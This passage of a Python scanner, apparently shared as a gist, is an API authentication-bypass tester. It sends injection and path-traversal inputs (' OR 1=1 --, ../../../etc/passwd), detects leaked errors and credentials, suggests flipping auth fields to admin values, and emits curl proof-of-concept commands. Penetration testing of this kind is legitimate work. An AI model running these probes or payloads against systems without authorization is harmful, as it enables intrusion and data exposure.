"""Test 9: Information Disclosure in Error Messages""" | |
try: | |
# Skip if URL doesn't look like an API endpoint | |
if not any(pattern in url.lower() for pattern in ['api', 'ajax', 'rest', 'service']): | |
return {'vulnerable': False} | |
# Skip support/help endpoints | |
if any(pattern in url.lower() for pattern in ['support.', 'help.', '/help_center/', '/support/']): | |
return {'vulnerable': False} | |
# Trigger errors with malformed requests | |
error_triggers = [ | |
{'method': 'POST', 'data': 'invalid json', 'headers': {'Content-Type': 'application/json'}}, | |
{'method': 'POST', 'data': '{"test": }', 'headers': {'Content-Type': 'application/json'}}, | |
{'method': 'GET', 'params': {'id': "' OR 1=1 --"}}, | |
{'method': 'GET', 'params': {'debug': 'true', 'test': '../../../etc/passwd'}}, | |
{'method': 'POST', 'data': '<invalid>xml</xml>', 'headers': {'Content-Type': 'application/xml'}} | |
] | |
for trigger in error_triggers: | |
method = trigger.pop('method', 'GET') | |
response = self.session.request(method, url, timeout=self.timeout, **trigger) | |
# Look for real error disclosures (not just HTML pages) | |
if self.is_meaningful_response(response) or response.status_code >= 400: | |
content = response.text | |
# Enhanced patterns for real security issues | |
critical_patterns = [ | |
(r'(com\.[\w\.]+Exception)', 'Java Exception'), | |
(r'(org\.[\w\.]+Exception)', 'Java Framework Exception'), | |
(r'at\s+[\w\.$]+\([\w\.]+:\d+\)', 'Java Stack Trace'), | |
(r'File\s+"([^"]+\.py)"\,?\s+line\s+\d+', 'Python Stack Trace'), | |
(r'(Microsoft\.[\w\.]+Exception)', '.NET Exception'), | |
(r'(System\.[\w\.]+Exception)', '.NET System Exception'), | |
(r'(\/home\/[\w\/]+\.[\w]+|\/var\/www\/[\w\/]+\.[\w]+|C:\\[\w\\]+\.[\w]+)', 'File Path Disclosure'), | |
(r'(SELECT\s+\*?\s*FROM\s+[\w\.]+|INSERT\s+INTO\s+[\w\.]+|UPDATE\s+[\w\.]+\s+SET|DELETE\s+FROM\s+[\w\.]+)', 'SQL Query Disclosure'), | |
(r'(mysql_fetch_|mysqli_|pg_query|oci_parse)\s*\(', 'Database Function'), | |
(r'(root|admin|password|pwd)\s*[:=]\s*["\']?([a-zA-Z0-9!@#$%^&*()_+\-=\[\]{};:,.<>?]{8,})["\']?(?!\w)', 'Credential Disclosure'), | |
(r'(MongoDB|Redis|PostgreSQL|MySQL|Oracle|MSSQL)\s+(error|Error|ERROR)', 'Database Error'), | |
(r'"stack":\s*"[^"]+Error[^"]+"', 'JSON Stack Trace'), | |
(r'Traceback\s+\(most\s+recent\s+call\s+last\)', 'Python Traceback'), | |
(r'Warning:\s+[\w_]+\(\)\s+\[[\w\.]+\]:', 'PHP Warning'), | |
(r'Fatal error:\s+[\w\s]+in\s+[\w\/\.]+\s+on\s+line\s+\d+', 'PHP Fatal Error') | |
] | |
for pattern, disclosure_type in critical_patterns: | |
match = re.search(pattern, content, re.IGNORECASE | re.MULTILINE) | |
if match: | |
# For SQL queries, ensure it's a real query not just words | |
if disclosure_type == 'SQL Query Disclosure': | |
query_text = match.group(0) | |
# Must have actual SQL structure, not just keywords | |
if not any(sql_struct in query_text.upper() for sql_struct in ['SELECT', 'FROM', 'INSERT INTO', 'UPDATE', 'DELETE FROM']): | |
continue | |
# For file paths, ensure it's an actual file path | |
if disclosure_type == 'File Path Disclosure': | |
path_text = match.group(1) | |
# Must have file extension or be clearly a path | |
file_extensions = r'\.(php|py|java|cs|rb|js)$' | |
if not (re.search(file_extensions, path_text) or '/' in path_text or '\\' in path_text): | |
continue | |
# For credential disclosure, do extra validation | |
if disclosure_type == 'Credential Disclosure': | |
# Skip if it's part of JavaScript code | |
match_text = match.group(0) | |
if any(js_term in match_text for js_term in ['shadowRoot', 'formToroRoot', 'documentRoot', 'querySelector']): | |
continue | |
# Check if there's an actual value after the = | |
if match.lastindex >= 2: | |
cred_value = match.group(2) | |
if len(cred_value) < 6 or cred_value in ['true', 'false', 'null', 'undefined', 'this', 'self']: | |
continue | |
# Extract relevant error context | |
error_context = content[max(0, match.start()-100):min(len(content), match.end()+100)] | |
return { | |
'vulnerable': True, | |
'method': f'Information Disclosure - {disclosure_type}', | |
'details': f'Error message reveals sensitive information: {disclosure_type}', | |
'exploitation': 'Craft malformed requests to extract system information', | |
'poc': self._generate_error_poc(url, trigger, method), | |
'error_sample': error_context, | |
'severity': 'HIGH' if 'Stack Trace' in disclosure_type or 'SQL' in disclosure_type else 'MEDIUM' | |
} | |
return {'vulnerable': False} | |
except Exception as e: | |
return {'vulnerable': False, 'error': str(e)} | |
def _generate_error_poc(self, url: str, trigger: dict, method: str) -> str: | |
"""Generate POC command for error triggering""" | |
if method == 'POST': | |
data = trigger.get('data', '') | |
headers = trigger.get('headers', {}) | |
header_str = ' '.join([f'-H "{k}: {v}"' for k, v in headers.items()]) | |
return f'curl -X POST "{url}" -d \'{data}\' {header_str}' | |
else: | |
params = trigger.get('params', {}) | |
param_str = '&'.join([f'{k}={v}' for k, v in params.items()]) | |
return f'curl -X GET "{url}?{param_str}"' | |
def test_json_manipulation(self, url: str, original_response: requests.Response) -> Dict: | |
"""Test JSON response manipulation bypass""" | |
try: | |
if original_response.status_code != 200: | |
return {'vulnerable': False} | |
try: | |
data = original_response.json() | |
except: | |
return {'vulnerable': False} | |
# Look for authentication/authorization fields | |
bypass_found = False | |
potential_bypasses = [] | |
for key, value in self.flatten_dict(data).items(): | |
# Check for auth-related fields with negative values | |
if any(indicator in key.lower() for indicator in self.bypass_indicators): | |
if value is False or str(value).lower() in ['false', '0', 'no', 'disabled', 'expired', 'unauthorized']: | |
bypass_found = True | |
potential_bypasses.append({ | |
'field': key, | |
'current_value': value, | |
'suggested_value': self.get_bypass_value(key, value), | |
'impact': self.assess_bypass_impact(key) | |
}) | |
# Only report if we found high-impact bypasses | |
high_impact_bypasses = [b for b in potential_bypasses if b['impact'] == 'HIGH'] | |
if high_impact_bypasses: | |
return { | |
'vulnerable': True, | |
'method': 'JSON Response Manipulation - Authentication Bypass', | |
'details': f'Found {len(high_impact_bypasses)} high-impact bypass opportunities', | |
'bypass_opportunities': high_impact_bypasses[:3], # Limit to top 3 | |
'exploitation': 'Intercept response and modify authentication fields', | |
'poc': f'curl -X GET "{url}" # Intercept with Burp Suite and modify response', | |
'response_sample': json.dumps(data, indent=2)[:300] + '...' if len(json.dumps(data)) > 300 else json.dumps(data, indent=2) | |
} | |
return {'vulnerable': False} | |
except Exception as e: | |
return {'vulnerable': False, 'error': str(e)} | |
def assess_bypass_impact(self, field_name: str) -> str: | |
"""Assess the impact of bypassing a specific field""" | |
field_lower = field_name.lower() | |
high_impact_keywords = [ | |
'authenticated', 'authorized', 'logged_in', 'isadmin', 'is_admin', | |
'admin', 'root', 'superuser', 'premium', 'paid', 'licensed' | |
] | |
medium_impact_keywords = [ | |
'enabled', 'active', 'valid', 'verified', 'confirmed' | |
] | |
if any(keyword in field_lower for keyword in high_impact_keywords): | |
return 'HIGH' | |
elif any(keyword in field_lower for keyword in medium_impact_keywords): | |
return 'MEDIUM' | |
else: | |
return 'LOW' | |
def get_bypass_value(self, key: str, current_value) -> str: | |
"""Suggest appropriate bypass value based on the field name and current value""" | |
key_lower = key.lower() | |
if any(word in key_lower for word in ['expired', 'disabled', 'restricted']): | |
return 'false' if current_value else 'true' | |
elif 'level' in key_lower or 'role' in key_lower: | |
return 'admin' if isinstance(current_value, str) else '999' | |
else: | |
return 'true' if current_value is False else 'false' | |
def check_for_auth_errors(self, data: dict) -> bool: | |
"""Check if response contains authentication/authorization errors""" | |
error_indicators = [ | |
'unauthorized', 'forbidden', 'access_denied', 'insufficient_privileges', | |
'login_required', 'authentication_required', 'invalid_token', | |
'permission_denied', 'not_authorized', 'access_forbidden' | |
] | |
# Convert entire response to lowercase string for searching | |
response_str = json.dumps(data).lower() | |
return any(indicator in response_str for indicator in error_indicators) | |
def flatten_dict(self, d: dict, parent_key: str = '', sep: str = '.') -> dict: | |
"""Flatten nested dictionary for easier searching""" | |
items = [] | |
for k, v in d.items(): | |
new_key = f"{parent_key}{sep}{k}" if parent_key else k | |
if isinstance(v, dict): | |
items.extend(self.flatten_dict(v, new_key, sep=sep).items()) | |
else: | |
items.append((new_key, v)) | |
return dict(items) | |
def test_all_endpoints(self, urls: List[str]) -> List[Dict]: | |
"""Test all API endpoints concurrently for multiple bypass techniques""" | |
logger.info(f"Testing {len(urls)} endpoints for authentication bypasses using 9 different techniques") | |
results = [] | |
with ThreadPoolExecutor(max_workers=self.threads) as executor: | |
future_to_url = {executor.submit(self.test_endpoint_bypass, url): url for url in urls} | |
for future in as_completed(future_to_url): | |
result = future.result() | |
if result['vulnerable']: | |
# Handle multiple vulnerabilities per endpoint | |
if 'vulnerabilities' in result: | |
for vuln in result['vulnerabilities']: | |
vuln_result = { | |
'url': result['url'], | |
'vulnerable': True, | |
**vuln | |
} | |
self.vulnerable_endpoints.append(vuln_result) | |
logger.info(f"π¨ VULNERABLE: {result['url']} - {vuln.get('method', 'Unknown')}") | |
else: | |
self.vulnerable_endpoints.append(result) | |
logger.info(f"π¨ VULNERABLE: {result['url']} - {result.get('method', 'Unknown')}") | |
results.append(result) | |
return results | |
def generate_report(self, results: List[Dict]) -> str: | |
"""Generate a detailed report of findings""" | |
total_tested = len(results) | |
vulnerable = len(self.vulnerable_endpoints) | |
report = f""" | |
=== Enhanced API Security Test Results (v4) === | |
Domain: {self.domain} | |
Total URLs discovered: {len(self.found_urls)} | |
API endpoints tested: {total_tested} | |
Vulnerable endpoints found: {vulnerable} | |
TESTS PERFORMED: | |
1. Response Manipulation (Boolean/Redirect Bypass) | |
2. Missing Authentication on Sensitive Endpoints | |
3. Insecure Direct Object Reference (IDOR) | |
4. Weak Session Token/Cookie Validation | |
5. Privilege Escalation via Parameter Tampering | |
6. HTTP Method Access Control Bypass | |
7. Information Disclosure (Exposed Secrets) | |
8. CORS Misconfiguration | |
9. Error Message Information Disclosure | |
""" | |
if vulnerable > 0: | |
# Sort vulnerabilities by severity | |
critical_vulns = [v for v in self.vulnerable_endpoints if v.get('severity') == 'CRITICAL'] | |
high_vulns = [v for v in self.vulnerable_endpoints if v.get('severity') == 'HIGH'] | |
other_vulns = [v for v in self.vulnerable_endpoints if v.get('severity') not in ['CRITICAL', 'HIGH']] | |
sorted_vulns = critical_vulns + high_vulns + other_vulns | |
report += "=== VULNERABLE API ENDPOINTS ===\n" | |
for vuln in sorted_vulns: | |
severity = vuln.get('severity', 'MEDIUM') | |
report += f""" | |
URL: {vuln['url']} | |
Severity: {severity} | |
Vulnerability: {vuln.get('method', 'Unknown')} | |
Details: {vuln.get('details', 'No additional details')} | |
Exploitation: {vuln.get('exploitation', 'Manual testing required')} | |
π PROOF OF CONCEPT (POC): | |
{vuln.get('poc', 'Manual verification required')} | |
""" | |
if 'response_sample' in vuln: | |
report += f""" | |
π Response Sample: | |
{vuln['response_sample']} | |
""" | |
if 'bypass_opportunities' in vuln: | |
report += "\nπ― Specific Bypass Opportunities:\n" | |
for bypass in vuln['bypass_opportunities']: | |
report += f" - Change '{bypass['field']}' from '{bypass['current_value']}' to '{bypass['suggested_value']}' (Impact: {bypass.get('impact', 'Unknown')})\n" | |
if 'secrets_found' in vuln: | |
report += f"\nπ Secrets Found: {', '.join(vuln['secrets_found'])}\n" | |
if 'cors_header' in vuln: | |
report += f"\nπ CORS Header: {vuln['cors_header']}\n" | |
if 'error_sample' in vuln: | |
report += f"\nβ οΈ Error Sample:\n{vuln['error_sample']}\n" | |
report += "\n" + "="*60 + "\n" | |
report += f""" | |
=== SUMMARY BY VULNERABILITY TYPE === | |
""" | |
# Count vulnerabilities by type | |
vuln_types = {} | |
for vuln in self.vulnerable_endpoints: | |
vuln_type = vuln.get('method', 'Unknown') | |
vuln_types[vuln_type] = vuln_types.get(vuln_type, 0) + 1 | |
for vuln_type, count in sorted(vuln_types.items()): | |
report += f"{vuln_type}: {count} endpoints\n" | |
# Add severity summary | |
report += f""" | |
=== SUMMARY BY SEVERITY === | |
CRITICAL: {len(critical_vulns)} vulnerabilities | |
HIGH: {len(high_vulns)} vulnerabilities | |
MEDIUM/LOW: {len(other_vulns)} vulnerabilities | |
""" | |
return report | |
def run_full_scan(self) -> str: | |
"""Run the complete authentication bypass scan""" | |
logger.info(f"Starting enhanced API security scan for {self.domain}") | |
# Step 1: Discover URLs | |
all_urls = self.run_urlfinder() | |
if not all_urls: | |
return "No URLs discovered. Check URLfinder installation and domain validity." | |
self.found_urls = set(all_urls) | |
# Step 2: Filter API endpoints | |
api_urls = self.filter_api_endpoints(all_urls) | |
if not api_urls: | |
return "No API endpoints found in discovered URLs." | |
# Step 3: Test for bypasses | |
results = self.test_all_endpoints(api_urls) | |
# Step 4: Generate report | |
return self.generate_report(results) | |
def main(): | |
parser = argparse.ArgumentParser(description='Enhanced Authentication Bypass Tester v4') | |
parser.add_argument('domain', help='Target domain to test') | |
parser.add_argument('-t', '--threads', type=int, default=10, help='Number of threads (default: 10)') | |
parser.add_argument('-o', '--output', help='Output file for results') | |
parser.add_argument('--timeout', type=int, default=10, help='Request timeout in seconds (default: 10)') | |
args = parser.parse_args() | |
# Validate domain | |
if not args.domain or '.' not in args.domain: | |
logger.error("Please provide a valid domain") | |
return | |
# Warning message | |
print("β οΈ WARNING: Only use this tool on domains you own or have explicit permission to test!") | |
print("Unauthorized testing may be illegal and could result in serious consequences.") | |
print("\nπ Enhanced Version 4.0 - Further False Positive Reduction") | |
print(" - Better HTML vs API response detection") | |
print(" - Improved JavaScript code filtering") | |
print(" - Skip logout endpoints") | |
print(" - Enhanced credential validation\n") | |
# Run the scan | |
tester = AuthBypassTester(args.domain, threads=args.threads, timeout=args.timeout) | |
report = tester.run_full_scan() | |
# Output results | |
print(report) | |
if args.output: | |
with open(args.output, 'w') as f: | |
f.write(report) | |
logger.info(f"Results saved to {args.output}") | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment